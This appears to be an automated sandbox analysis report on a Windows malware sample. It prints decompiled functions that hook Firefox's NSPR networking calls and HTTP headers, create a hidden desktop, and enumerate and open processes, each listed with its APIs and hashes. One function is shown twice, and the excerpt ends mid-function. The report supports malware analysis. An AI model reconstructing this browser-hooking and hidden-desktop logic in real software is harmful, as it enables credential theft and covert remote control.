        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00405009(struct HINSTANCE__* __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
        				_Unknown_base(*)()* _t12;
        				struct HINSTANCE__* _t14;
        
        				 *0x4223dc =  *0x4223dc & 0x00000000;
        				 *0x4223e0 =  *0x4223e0 & 0x00000000;
        				_t14 = __eax;
        				InitializeCriticalSection(0x4223c0);
        				 *0x4223d8 = _a4;
        				 *0x4223b4 = _a8;
        				 *0x4223e4 = _a12;
        				 *0x4223b8 = _t14;
        				 *0x4223b0 = _a16;
        				 *0x4223ac = GetProcAddress(_t14, "PR_GetNameForIdentity");
        				 *0x4223bc = GetProcAddress( *0x4223b8, "PR_SetError");
        				_t12 = GetProcAddress( *0x4223b8, "PR_GetError");
        				 *0x4223a8 = _t12;
        				return _t12;
        			}

        APIs
        • InitializeCriticalSection.KERNEL32(004223C0,0001FEBC,0041D6E0,00422348), ref: 0040501F
        • GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 0040505B
        • GetProcAddress.KERNEL32(PR_SetError), ref: 0040506D
        • GetProcAddress.KERNEL32(PR_GetError), ref: 0040507F
        Strings
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: AddressProc$CriticalInitializeSection
        • String ID: PR_GetError$PR_GetNameForIdentity$PR_SetError
        • API String ID: 2804437462-2578621715
        • Opcode ID: 86f6732d1267a67c644fb676fb2f042d0951ec7e20fc3586121d7b5137191a07
        • Instruction ID: f3dcad840434ac70956c5be4f0b71213a111c991e6a7b1c34c312d4cdba5c580
        • Opcode Fuzzy Hash: 86f6732d1267a67c644fb676fb2f042d0951ec7e20fc3586121d7b5137191a07
        • Instruction Fuzzy Hash: 30019DB4A04310BFC760CF35EE48B063FE0EB18761B94483AAC04A3264D3B89446CF88
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 77%
        			E0041AB58(void* __edx, intOrPtr* _a4) {
        				char _v524;
        				char _v544;
        				char _v556;
        				intOrPtr _v572;
        				char _v924;
        				char _v1028;
        				char _v1040;
        				char _v1060;
        				intOrPtr _v1104;
        				intOrPtr _v1108;
        				intOrPtr _v1112;
        				intOrPtr _v1116;
        				char _v1120;
        				char* _v1124;
        				intOrPtr _v1128;
        				char _v1132;
        				intOrPtr _v1144;
        				signed short _v1146;
        				char _v1148;
        				signed int _v1152;
        				signed int _v1156;
        				char _v1157;
        				signed int _v1160;
        				void* _v1164;
        				void* _v1168;
        				char _v1177;
        				char _v1180;
        				void* __ebx;
        				void* __edi;
        				void* __esi;
        				signed int _t59;
        				void* _t62;
        				signed int _t71;
        				char _t77;
        				char* _t85;
        				char _t88;
        				char _t95;
        				short _t100;
        				intOrPtr* _t105;
        				void* _t111;
        				char _t112;
        				signed int _t118;
        				signed int _t119;
        				void* _t123;
        
        				_t111 = __edx;
        				_t105 = _a4;
        				_t59 =  *(_t105 + 4);
        				_push(_t118);
        				_t119 = _t118 | 0xffffffff;
        				_v1152 = _t119;
        				_v1156 = _t119;
        				if(_t59 == _t119 || _t59 == 0xfffffffe) {
        					L4:
        					_t62 = E0040C841( *((intOrPtr*)( *_t105 + 8)), _t108, 0);
        					_t109 =  *_t105;
        					_t63 = E0040F24B(_t62,  *_t105,  *((intOrPtr*)( *_t105 + 4)));
        					_v1160 = _t63;
        					_t133 = _t63 - _t119;
        					if(_t63 == _t119) {
        						goto L20;
        					}
        					E0040F5BD(_t109, _t63);
        					E0040F57B(_v1160);
        					_push(_t105 + 8);
        					_push(3);
        					_push(_v1164);
        					_t123 = 4;
        					if(E0041285A(_t109, _t123, _t133) == 0) {
        						goto L20;
        					}
        					_t71 =  *(_t105 + 4);
        					if(_t71 == 0xfffffffe) {
        						SetThreadPriority(GetCurrentThread(), 1);
        						E00413140(0x2937498d,  &_v1028, 0);
        						_t63 = E0040A2BA(_t109, __eflags,  &_v1040);
        						__eflags = _t63;
        						if(_t63 == 0) {
        							goto L20;
        						}
        						_t77 = E00416770(_t109, _t111,  &_v924, 1);
        						__eflags = _t77;
        						if(_t77 == 0) {
        							L19:
        							_t63 = E004169DB( &_v924, 1);
        							goto L20;
        						} else {
        							__imp__GetShellWindow();
        							__eflags = _t77;
        							_v1157 = _t77 != 0;
        							__eflags = _v1157;
        							if(_v1157 == 0) {
        								E004128DB(0xa8,  &_v1132);
        								_t85 =  &_v524;
        								__imp__SHGetFolderPathW(0, 0x25, 0, 0, _t85);
        								__eflags = _t85;
        								if(_t85 == 0) {
        									_t88 = E00411A47( &_v1132,  &_v544,  &_v544);
        									__eflags = _t88;
        									if(_t88 != 0) {
        										_t112 = 0x44;
        										E0040C275( &_v1120,  &_v1120, 0, _t112);
        										_v1124 =  &_v1060;
        										_v1132 = _t112;
        										_t95 = E0040DA89( &_v556, 0, 0,  &_v1132,  &_v1180);
        										__eflags = _t95;
        										if(_t95 != 0) {
        											WaitForSingleObject(_v1168, 0x1388);
        											CloseHandle(_v1164);
        											CloseHandle(_v1168);
        											_v1177 = 1;
        										}
        									}
        								}
        							}
        							SystemParametersInfoW(0x1003, 0, 0, 0);
        							__eflags = _v1157 - 1;
        							if(__eflags == 0) {
        								_v1132 =  &_v924;
        								_v1128 = 0x416bea;
        								_v1124 = 0x416bed;
        								_v1120 = E00416BF0;
        								_v1116 = E00416C14;
        								_v1112 = E00416C5B;
        								_v1108 = E00416C90;
        								_v1104 = 0x416bea;
        								E0040718A(__eflags, _v1156,  &_v1132, _v924, _v572);
        							}
        							goto L19;
        						}
        					} else {
        						if(_t71 == 0xffffffff) {
        							_t63 = E0041C27A(_v1156, _t109);
        						} else {
        							_push(_v1152);
        							_t63 = E0040F3BE(_v1156);
        							_t105 = _a4;
        						}
        						goto L20;
        					}
        				} else {
        					_t100 = 2;
        					_v1148 = _t100;
        					_t108 =  *(_t105 + 4) << 8;
        					_v1146 =  *(_t105 + 5) & 0x000000ff |  *(_t105 + 4) << 0x00000008;
        					_v1144 = 0x100007f;
        					_t63 = E0040F20A( &_v1148);
        					_v1152 = _t63;
        					if(_t63 == _t119) {
        						L20:
        						E0040F565(E0040F565(_t63, _v1156), _v1152);
        						E0040C1C2(_t105);
        						return 0;
        					} else {
        						E0040F5BD(_t108, _t63);
        						goto L4;
        					}
        				}
        			}

        APIs
          • Part of subcall function 0040F20A: #23.WS2_32(?,00000001,00000006,?,0040F2E9,?,?,?,0041AE6A,?), ref: 0040F213
          • Part of subcall function 0040F20A: #4.WS2_32(00000000,?,-0000001D,?,?,?,0041AE6A,?), ref: 0040F233
          • Part of subcall function 0040F20A: #3.WS2_32(00000000,?,?,?,0041AE6A,?), ref: 0040F23E
          • Part of subcall function 0040F5BD: #21.WS2_32(?,00000006,00000001,?,00000004,?,?,0041427D,00000000), ref: 0040F5D3
        • GetCurrentThread.KERNEL32 ref: 0041AC3D
        • SetThreadPriority.KERNEL32(00000000), ref: 0041AC44
          • Part of subcall function 0040A2BA: OpenWindowStationW.USER32 ref: 0040A2DF
          • Part of subcall function 0040A2BA: CreateWindowStationW.USER32 ref: 0040A2F2
          • Part of subcall function 0040A2BA: GetProcessWindowStation.USER32 ref: 0040A303
          • Part of subcall function 0040A2BA: OpenDesktopW.USER32(?,00000000,00000000,10000000), ref: 0040A33E
          • Part of subcall function 0040A2BA: CreateDesktopW.USER32 ref: 0040A352
          • Part of subcall function 0040A2BA: GetCurrentThreadId.KERNEL32 ref: 0040A35E
          • Part of subcall function 0040A2BA: GetThreadDesktop.USER32(00000000), ref: 0040A365
          • Part of subcall function 0040A2BA: SetThreadDesktop.USER32(00000000,00000000,00000000), ref: 0040A377
          • Part of subcall function 0040A2BA: CloseDesktop.USER32(00000000,00000000,00000000), ref: 0040A389
          • Part of subcall function 0040A2BA: CloseWindowStation.USER32(?,?), ref: 0040A3A4
          • Part of subcall function 00416770: TlsAlloc.KERNEL32(00423E80,00000000,0000018C,00000000,00000000), ref: 00416789
        • GetShellWindow.USER32 ref: 0041AC8A
        • SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?,?), ref: 0041ACBD
          • Part of subcall function 00411A47: PathCombineW.SHLWAPI(00412BBC,00412BBC,?,00412BBC,?,?), ref: 00411A66
        • WaitForSingleObject.KERNEL32(00000000,00001388,?,00000000,00000000,?,00000044,?,00000000,00000044,?,?), ref: 0041AD1F
        • CloseHandle.KERNEL32(?), ref: 0041AD2F
        • CloseHandle.KERNEL32(?), ref: 0041AD35
        • SystemParametersInfoW.USER32 ref: 0041AD44
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: DesktopThreadWindow$CloseStation$CreateCurrentHandleOpenPath$AllocCombineFolderInfoObjectParametersPriorityProcessShellSingleSystemWait
        • String ID:
        • API String ID: 2295704857-0
        • Opcode ID: 11b700432be9c607f7731a01a02388cfbe91d3c54ded604f65dcfb8c59d970f2
        • Instruction ID: 281bb4c474db6f9a72ccc591067f138f9e1ddd02bfd3f89af6a864bb6c6c52c9
        • Opcode Fuzzy Hash: 11b700432be9c607f7731a01a02388cfbe91d3c54ded604f65dcfb8c59d970f2
        • Instruction Fuzzy Hash: 5561D471008341ABC720EF65CD44ADFBBE9AF85714F00492EF994A72A1D778D889CB5B
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0041CD60(void* __ecx, void* __eflags, void* _a4, intOrPtr* _a8, intOrPtr* _a12) {
        				intOrPtr _v16;
        				signed char* _v20;
        				intOrPtr _v36;
        				intOrPtr _v40;
        				intOrPtr _v44;
        				intOrPtr _v64;
        				intOrPtr _v68;
        				intOrPtr _v72;
        				char _v76;
        				char _v104;
        				signed int _v116;
        				signed int _v120;
        				signed int _v124;
        				signed int _v125;
        				char _v128;
        				char _v136;
        				intOrPtr _v172;
        				char _v173;
        				signed int _v176;
        				intOrPtr _v180;
        				void* __ebx;
        				void* __edi;
        				void* __esi;
        				signed char _t85;
        				signed int _t88;
        				void* _t92;
        				void* _t96;
        				void* _t100;
        				signed int _t107;
        				signed char* _t119;
        				signed int _t120;
        				struct _CRITICAL_SECTION* _t126;
        				char* _t138;
        				char* _t139;
        				char* _t140;
        				signed int _t142;
        				signed int _t148;
        
        				_v120 = _v120 | 0xffffffff;
        				if(E0041CC45( &_v76, __ecx, __eflags, _a4,  *_a8,  *_a12) == 0) {
        					L23:
        					E004159FB( &_v76);
        					return _v120;
        				}
        				_t85 = E004150CD( &_v76);
        				_v120 = _t85;
        				if((1 & _t85) == 0) {
        					__eflags = _t85 & 0x00000002;
        					if((_t85 & 0x00000002) == 0) {
        						_t126 = 0x42400c;
        						L18:
        						__eflags = _v116 & 0x00000004;
        						if((_v116 & 0x00000004) == 0) {
        							goto L23;
        						}
        						 *_a8 = _v40;
        						 *_a12 = _v36;
        						EnterCriticalSection(_t126);
        						_t146 = _a4;
        						_t88 = E0041C2C7(_a4);
        						__eflags = _t88 - 0xffffffff;
        						if(_t88 != 0xffffffff) {
        							L21:
        							_t148 = _t88 * 0x24;
        							__eflags = _t148;
        							E0040C1C2( *((intOrPtr*)(_t148 +  *0x423e7c + 8)));
        							 *((intOrPtr*)(_t148 +  *0x423e7c + 8)) = _v44;
        							L22:
        							LeaveCriticalSection(_t126);
        							goto L23;
        						}
        						_t88 = E0041C2ED(_t88, _t146);
        						__eflags = _t88 - 0xffffffff;
        						if(_t88 == 0xffffffff) {
        							goto L22;
        						}
        						goto L21;
        					}
        					_v124 = _v124 & 0x00000000;
        					_v125 = 1;
        					__eflags = _v16 - 1;
        					if(_v16 != 1) {
        						L9:
        						_t138 =  &_v104;
        						_t92 = 0x21;
        						E004128A5(_t92, _t138);
        						HttpAddRequestHeadersA(_a4, _t138, 0xffffffff, 0xa0000000);
        						_t139 =  &_v128;
        						_t96 = 0x22;
        						E004128A5(_t96, _t139);
        						HttpAddRequestHeadersA(_a4, _t139, 0xffffffff, 0x80000000);
        						_t140 =  &_v136;
        						_t100 = 0x23;
        						E004128A5(_t100, _t140);
        						HttpAddRequestHeadersA(_a4, _t140, 0xffffffff, 0x80000000);
        						L10:
        						_t126 = 0x42400c;
        						EnterCriticalSection(0x42400c);
        						__eflags = _v173;
        						if(_v173 == 0) {
        							L14:
        							E00415A65(_v64, _v68);
        							__eflags = _v176;
        							if(_v176 != 0) {
        								E0040DE4F(_v172);
        							}
        							L16:
        							LeaveCriticalSection(_t126);
        							goto L18;
        						}
        						_t150 = _a4;
        						_t107 = E0041C2C7(_a4);
        						__eflags = _t107 - 0xffffffff;
        						if(_t107 != 0xffffffff) {
        							L13:
        							_t142 = _t107 * 0x24;
        							E00415A65( *((intOrPtr*)( *0x423e7c + _t142 + 0x10)),  *((intOrPtr*)( *0x423e7c + _t142 + 0xc)));
        							E0040C1C2( *(_t142 +  *0x423e7c + 0x14));
        							 *(_t142 +  *0x423e7c + 0x14) =  *(_t142 +  *0x423e7c + 0x14) & 0x00000000;
        							 *(_t142 +  *0x423e7c + 0x1c) =  *(_t142 +  *0x423e7c + 0x1c) & 0x00000000;
        							 *(_t142 +  *0x423e7c + 0x18) =  *(_t142 +  *0x423e7c + 0x18) | 0xffffffff;
        							 *((intOrPtr*)(_t142 +  *0x423e7c + 0xc)) = _v76;
        							 *((intOrPtr*)(_t142 +  *0x423e7c + 0x10)) = _v72;
        							 *((intOrPtr*)(_t142 +  *0x423e7c + 0x20)) = _v180;
        							goto L16;
        						}
        						_t107 = E0041C2ED(_t107, _t150);
        						__eflags = _t107 - 0xffffffff;
        						if(_t107 == 0xffffffff) {
        							goto L14;
        						}
        						goto L13;
        					}
        					_t119 = _v20;
        					__eflags =  *_t119 & 0x00000003;
        					if(( *_t119 & 0x00000003) == 0) {
        						goto L9;
        					}
        					_t120 = E00415CC0(_t119,  &_v76);
        					_v124 = _t120;
        					__eflags = _t120;
        					if(_t120 != 0) {
        						_v120 = 1;
        					} else {
        						_v125 = _t120;
        					}
        					goto L10;
        				} else {
        					SetLastError(0x2f78);
        					_v120 = _v120 & 0x00000000;
        					goto L23;
        				}
        			}

        APIs
          • Part of subcall function 004150CD: EnterCriticalSection.KERNEL32(00423E54,-004223DC,00000000,004223C0), ref: 004150E8
          • Part of subcall function 004150CD: LeaveCriticalSection.KERNEL32(00423E54), ref: 0041516B
        • SetLastError.KERNEL32(00002F78,?), ref: 0041CDA7
        • EnterCriticalSection.KERNEL32(0042400C), ref: 0041CE4E
        • LeaveCriticalSection.KERNEL32(0042400C,?), ref: 0041CF04
        • EnterCriticalSection.KERNEL32(0042400C,?), ref: 0041CF2B
        • LeaveCriticalSection.KERNEL32(0042400C,?), ref: 0041CF6B
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: CriticalSection$EnterLeave$ErrorLast
        • String ID:
        • API String ID: 486337731-0
        • Opcode ID: a19101e10b8d8420592560b0faa8470eb111ef9944dccf7271f6313af0e25967
        • Instruction ID: e7d0cbe002f95a39e289d6771a18fb2ac5a97b51dd5bb2f30ed778911b11de95
        • Opcode Fuzzy Hash: a19101e10b8d8420592560b0faa8470eb111ef9944dccf7271f6313af0e25967
        • Instruction Fuzzy Hash: F551A231644301DBD721DF28DC84A9A7BA5FF89368F10466EF8A4972F1C738D985CB89
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0041D76E() {
        				long _v564;
        				char _v568;
        				void* _v572;
        				char _v576;
        				void* _v580;
        				void* _v584;
        				void* _v588;
        				char _v589;
        				signed int _v592;
        				signed int _v596;
        				char _v597;
        				void* __esi;
        				void* _t42;
        				struct tagPROCESSENTRY32W* _t45;
        				signed int _t47;
        				void* _t48;
        				long _t67;
        				int _t74;
        				void** _t76;
        				void* _t79;
        
        				_t74 = 0;
        				_v589 = 0;
        				_v584 = 0;
        				_v588 = 0;
        				while(1) {
        					_t42 = CreateToolhelp32Snapshot(2, _t74);
        					_v584 = _t42;
        					_v580 = _t74;
        					if(_t42 == 0xffffffff) {
        						break;
        					} else {
        						_t45 =  &_v568;
        						_v568 = 0x22c;
        						Process32FirstW(_v584, _t45);
        					}
        					while(_t45 != 0) {
        						_t67 = _v564;
        						if(_t67 <= _t74 || _t67 ==  *0x423b10) {
        							L20:
        							_t45 = Process32NextW(_v588,  &_v572);
        							continue;
        						} else {
        							_t47 = 0;
        							if(_v596 <= _t74) {
        								L8:
        								_t48 = E004130C4(_t67, _t72, _t67);
        								_v584 = _t48;
        								if(_t48 != _t74) {
        									_t79 = OpenProcess(0x400, _t74, _v564);
        									if(_t79 != _t74) {
        										_t76 = E0040D7D9(_t67, _t79,  &_v576);
        										CloseHandle(_t79);
        										if(_t76 != 0) {
        											if(_v576 ==  *0x4238b0 && GetLengthSid( *_t76) ==  *0x4238a8 && E0040C233( *((intOrPtr*)( *0x4238a4)),  *_t76, _t56) == 0 && E0040C14D(4 + _v596 * 4,  &_v592) != 0) {
        												_t72 = _v596;
        												_v596 = _v596 + 1;
        												_v584 = _v584 + 1;
        												 *((intOrPtr*)(_v592 + _v596 * 4)) = _v564;
        												if(E0041D6E5(_v592, _v564, _v580) != 0) {
        													_v597 = 1;
        												}
        											}
        											E0040C1C2(_t76);
        										}
        										_t74 = 0;
        									}
        									CloseHandle(_v580);
        								}
        								goto L20;
        							} else {
        								goto L6;
        							}
        							while(1) {
        								L6:
        								_t72 = _v592;
        								if( *((intOrPtr*)(_v592 + _t47 * 4)) == _t67) {
        									goto L20;
        								}
        								_t47 = _t47 + 1;
        								if(_t47 < _v596) {
        									continue;
        								}
        								goto L8;
        							}
        							goto L20;
        						}
        					}
        					CloseHandle(_v588);
        					if(_v584 != _t74) {
        						continue;
        					}
        					break;
        				}
        				E0040C1C2(_v588);
        				return _v597;
        			}

        APIs
        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041D795
        • Process32FirstW.KERNEL32 ref: 0041D7BD
        • OpenProcess.KERNEL32(00000400,00000000,0000022C,0000022C), ref: 0041D818
        • CloseHandle.KERNEL32(00000000,00000000,?), ref: 0041D836
        • GetLengthSid.ADVAPI32(00000000), ref: 0041D84A
        • CloseHandle.KERNEL32(?), ref: 0041D8BC
        • Process32NextW.KERNEL32(?,?), ref: 0041D8C7
        • CloseHandle.KERNEL32(?), ref: 0041D8D9
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: CloseHandle$Process32$CreateFirstLengthNextOpenProcessSnapshotToolhelp32
        • String ID:
        • API String ID: 1981844004-0
        • Opcode ID: 99b007e72a165d7aa50115ec1b6f90d50d3469f78bf00d9df824fd86016c85f7
        • Instruction ID: eabaa252c2f828ba57b1d57d06c82621023f6707fecf00368cb31ba16e78e5df
        • Opcode Fuzzy Hash: 99b007e72a165d7aa50115ec1b6f90d50d3469f78bf00d9df824fd86016c85f7
        • Instruction Fuzzy Hash: D1418A70908341DFD711EF24C9849ABBBE5FF89304F100A2EF5A4A72A1D739D985CB5A
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00407DF8(int __eax, long __ecx, void* __edx) {
        				struct HWND__* _v8;
        				signed short _v12;
        				int _v16;
        				long _v20;
        				struct tagPOINT _v28;
        				intOrPtr _t46;
        				int _t50;
        				signed int _t51;
        				signed int _t52;
        				signed int _t63;
        				signed int _t64;
        				signed int _t67;
        				signed int _t69;
        				signed int _t70;
        				signed int _t71;
        				int _t73;
        				void* _t74;
        				long _t78;
        				void* _t79;
        				void* _t80;
        				intOrPtr _t81;
        
        				_t80 = __edx;
        				_t73 = __eax;
        				_t78 = __ecx;
        				WaitForSingleObject( *(__edx + 0x14), 0xffffffff);
        				_t46 =  *((intOrPtr*)(_t80 + 0x10));
        				_v8 =  *((intOrPtr*)(_t46 + 0x108));
        				_v12 =  *(_t46 + 0x110) & 0x0000ffff;
        				ReleaseMutex( *(_t80 + 0x14));
        				_t50 = GetWindowRect(_v8,  &_v28);
        				if(_t50 != 0) {
        					if(_v12 != 2) {
        						_t51 = _v12 & 0x0000ffff;
        						__eflags = _t51 - 0xd;
        						if(__eflags > 0) {
        							_t52 = _t51 - 0xe;
        							__eflags = _t52;
        							if(_t52 == 0) {
        								_v20 = _t78;
        								goto L22;
        							} else {
        								_t63 = _t52 - 1;
        								__eflags = _t63;
        								if(_t63 == 0) {
        									_v16 = _t73;
        								} else {
        									_t64 = _t63 - 1;
        									__eflags = _t64;
        									if(_t64 == 0) {
        										_v16 = _t73;
        										goto L19;
        									} else {
        										__eflags = _t64 == 1;
        										if(_t64 == 1) {
        											goto L16;
        										}
        									}
        								}
        							}
        						} else {
        							if(__eflags == 0) {
        								L11:
        								_v28.x = _t78;
        								goto L22;
        							} else {
        								_t67 = _t51;
        								__eflags = _t67;
        								if(_t67 == 0) {
        									goto L11;
        								} else {
        									_t69 = _t67;
        									__eflags = _t69;
        									if(_t69 == 0) {
        										L16:
        										_v16 = _t73;
        										goto L17;
        									} else {
        										_t70 = _t69 - 6;
        										__eflags = _t70;
        										if(_t70 == 0) {
        											L19:
        											_v28.x = _t78;
        										} else {
        											_t71 = _t70 - 1;
        											__eflags = _t71;
        											if(_t71 == 0) {
        												L17:
        												_v20 = _t78;
        											} else {
        												__eflags = _t71 == 1;
        												if(_t71 == 1) {
        													L22:
        													_v28.y = _t73;
        												}
        											}
        										}
        									}
        								}
        							}
        						}
        					} else {
        						_t81 =  *((intOrPtr*)(_t80 + 0x10));
        						_t79 = _t78 -  *((intOrPtr*)(_t81 + 0x100));
        						_t74 = _t73 -  *((intOrPtr*)(_t81 + 0x104));
        						_v28.x = _v28.x + _t79;
        						_v28.y = _v28.y + _t74;
        						_v20 = _v20 + _t79;
        						_v16 = _v16 + _t74;
        					}
        					_t50 = IsRectEmpty( &_v28);
        					if(_t50 == 0) {
        						if((GetWindowLongW(_v8, 0xfffffff0) & 0x40000000) != 0) {
        							MapWindowPoints(0, GetParent(_v8),  &_v28, 2);
        						}
        						return SetWindowPos(_v8, 0, _v28.x, _v28.y, _v20 - _v28, _v16 - _v28.y, 0x630c);
        					}
        				}
        				return _t50;
        			}

        APIs
        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00407E0C
        • ReleaseMutex.KERNEL32(?), ref: 00407E2B
        • GetWindowRect.USER32 ref: 00407E38
        • IsRectEmpty.USER32(?), ref: 00407EBC
        • GetWindowLongW.USER32(?,000000F0), ref: 00407ECB
        • GetParent.USER32(?), ref: 00407EE1
        • MapWindowPoints.USER32 ref: 00407EEA
        • SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C), ref: 00407F0E
        Memory Dump Source
        • Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp
        Similarity
        • API ID: Window$Rect$EmptyLongMutexObjectParentPointsReleaseSingleWait
        • String ID:
        • API String ID: 2634726239-0
        • Opcode ID: f563bf4af23033e72dd984b9cca96006c6931ffe09f6873f266628bd578074bc
        • Instruction ID: a322bd2c658f0833cb6b0f0a38ff9ffaa20a9a7f680455052717c4b83f970561
        • Opcode Fuzzy Hash: f563bf4af23033e72dd984b9cca96006c6931ffe09f6873f266628bd578074bc
        • Instruction Fuzzy Hash: F7412371D0520AAFCB108FA8C9855FFBBB4FB04350F5045BAE511B22A0D778AD41DBE6
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00407DF8(int __eax, long __ecx, void* __edx) {
        				struct HWND__* _v8;
        				signed short _v12;
        				int _v16;
        				long _v20;
        				struct tagPOINT _v28;
        				intOrPtr _t46;
        				int _t50;
        				signed int _t51;
        				signed int _t52;
        				signed int _t63;
        				signed int _t64;
        				signed int _t67;
        				signed int _t69;
        				signed int _t70;
        				signed int _t71;
        				int _t73;
        				void* _t74;
        				long _t78;
        				void* _t79;
        				void* _t80;
        				intOrPtr _t81;
        
        				_t80 = __edx;
        				_t73 = __eax;
        				_t78 = __ecx;
        				WaitForSingleObject( *(__edx + 0x14), 0xffffffff);
        				_t46 =  *((intOrPtr*)(_t80 + 0x10));
        				_v8 =  *((intOrPtr*)(_t46 + 0x108));
        				_v12 =  *(_t46 + 0x110) & 0x0000ffff;
        				ReleaseMutex( *(_t80 + 0x14));
        				_t50 = GetWindowRect(_v8,  &_v28);
        				if(_t50 != 0) {
        					if(_v12 != 2) {
        						_t51 = _v12 & 0x0000ffff;
        						__eflags = _t51 - 0xd;
        						if(__eflags > 0) {
        							_t52 = _t51 - 0xe;
        							__eflags = _t52;
        							if(_t52 == 0) {
        								_v20 = _t78;
        								goto L22;
        							} else {
        								_t63 = _t52 - 1;
        								__eflags = _t63;
        								if(_t63 == 0) {
        									_v16 = _t73;
        								} else {
        									_t64 = _t63 - 1;
        									__eflags = _t64;
        									if(_t64 == 0) {
        										_v16 = _t73;
        										goto L19;
        									} else {
        										__eflags = _t64 == 1;
        										if(_t64 == 1) {
        											goto L16;
        										}
        									}
        								}
        							}
        						} else {
        							if(__eflags == 0) {
        								L11:
        								_v28.x = _t78;
        								goto L22;
        							} else {
        								_t67 = _t51;
        								__eflags = _t67;
        								if(_t67 == 0) {
        									goto L11;
        								} else {
        									_t69 = _t67;
        									__eflags = _t69;
        									if(_t69 == 0) {
        										L16:
        										_v16 = _t73;
        										goto L17;
        									} else {
        										_t70 = _t69 - 6;
        										__eflags = _t70;
        										if(_t70 == 0) {
        											L19:
        											_v28.x = _t78;
        										} else {
        											_t71 = _t70 - 1;
        											__eflags = _t71;
        											if(_t71 == 0) {
        												L17:
        												_v20 = _t78;
        											} else {
        												__eflags = _t71 == 1;
        												if(_t71 == 1) {
        													L22:
        													_v28.y = _t73;
        												}
        											}
        										}
        									}
        								}
        							}
        						}
        					} else {
        						_t81 =  *((intOrPtr*)(_t80 + 0x10));
        						_t79 = _t78 -  *((intOrPtr*)(_t81 + 0x100));
        						_t74 = _t73 -  *((intOrPtr*)(_t81 + 0x104));
        						_v28.x = _v28.x + _t79;
        						_v28.y = _v28.y + _t74;
        						_v20 = _v20 + _t79;
        						_v16 = _v16 + _t74;
        					}
        					_t50 = IsRectEmpty( &_v28);
        					if(_t50 == 0) {
        						if((GetWindowLongW(_v8, 0xfffffff0) & 0x40000000) != 0) {
        							MapWindowPoints(0, GetParent(_v8),  &_v28, 2);
        						}
        						return SetWindowPos(_v8, 0, _v28.x, _v28.y, _v20 - _v28, _v16 - _v28.y, 0x630c);
        					}
        				}
        				return _t50;
        			}

        APIs
        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00407E0C
        • ReleaseMutex.KERNEL32(?), ref: 00407E2B
        • GetWindowRect.USER32 ref: 00407E38
        • IsRectEmpty.USER32(?), ref: 00407EBC
        • GetWindowLongW.USER32(?,000000F0), ref: 00407ECB
        • GetParent.USER32(?), ref: 00407EE1
        • MapWindowPoints.USER32 ref: 00407EEA
        • SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C), ref: 00407F0E
        Memory Dump Source
        • Source File: 00000003.00000002.204116017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.204169559.0000000000425000.00000040.00000001.sdmp
        Similarity
        • API ID: Window$Rect$EmptyLongMutexObjectParentPointsReleaseSingleWait
        • String ID:
        • API String ID: 2634726239-0
        • Opcode ID: f563bf4af23033e72dd984b9cca96006c6931ffe09f6873f266628bd578074bc
        • Instruction ID: a322bd2c658f0833cb6b0f0a38ff9ffaa20a9a7f680455052717c4b83f970561
        • Opcode Fuzzy Hash: f563bf4af23033e72dd984b9cca96006c6931ffe09f6873f266628bd578074bc
        • Instruction Fuzzy Hash: F7412371D0520AAFCB108FA8C9855FFBBB4FB04350F5045BAE511B22A0D778AD41DBE6
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 90%
        			E004150CD(intOrPtr _a4) {
        				char _v9;
        				signed int _v16;
        				signed int _v20;
        				signed int _v24;
        				signed int _v32;
        				char _v36;
        				char _v60;
        				char _v72;
        				signed int _v76;
        				char* _v80;
        				void* _v96;
        				intOrPtr _v148;
        				void* _v160;
        				char _v168;
        				char _v272;
        				char _v536;
        				void* __ebx;
        				void* __edi;
        				void* __esi;
        				intOrPtr _t128;
        				intOrPtr* _t129;
        				char* _t130;
        				void* _t137;
        				void* _t140;
        				void* _t144;
        				void* _t152;
        				void* _t154;
        				char* _t156;
        				void* _t161;
        				void* _t163;
        				void* _t164;
        				void* _t167;
        				void* _t172;
        				intOrPtr _t174;
        				intOrPtr* _t176;
        				void* _t177;
        				void* _t182;
        				intOrPtr _t186;
        				intOrPtr _t187;
        				signed int _t189;
        				void* _t194;
        				void* _t197;
        				void* _t198;
        				void* _t199;
        				int _t204;
        				void* _t207;
        				signed int _t210;
        				void* _t214;
        				signed int _t217;
        				signed int _t218;
        				void* _t219;
        				void* _t224;
        				char* _t227;
        				intOrPtr _t228;
        				char* _t233;
        				char* _t236;
        				intOrPtr _t238;
        				signed int _t239;
        				intOrPtr _t240;
        				void* _t244;
        				void* _t247;
        
        				_t217 = 0;
        				_v16 = 0;
        				_v9 = 0xff;
        				EnterCriticalSection(0x423e54);
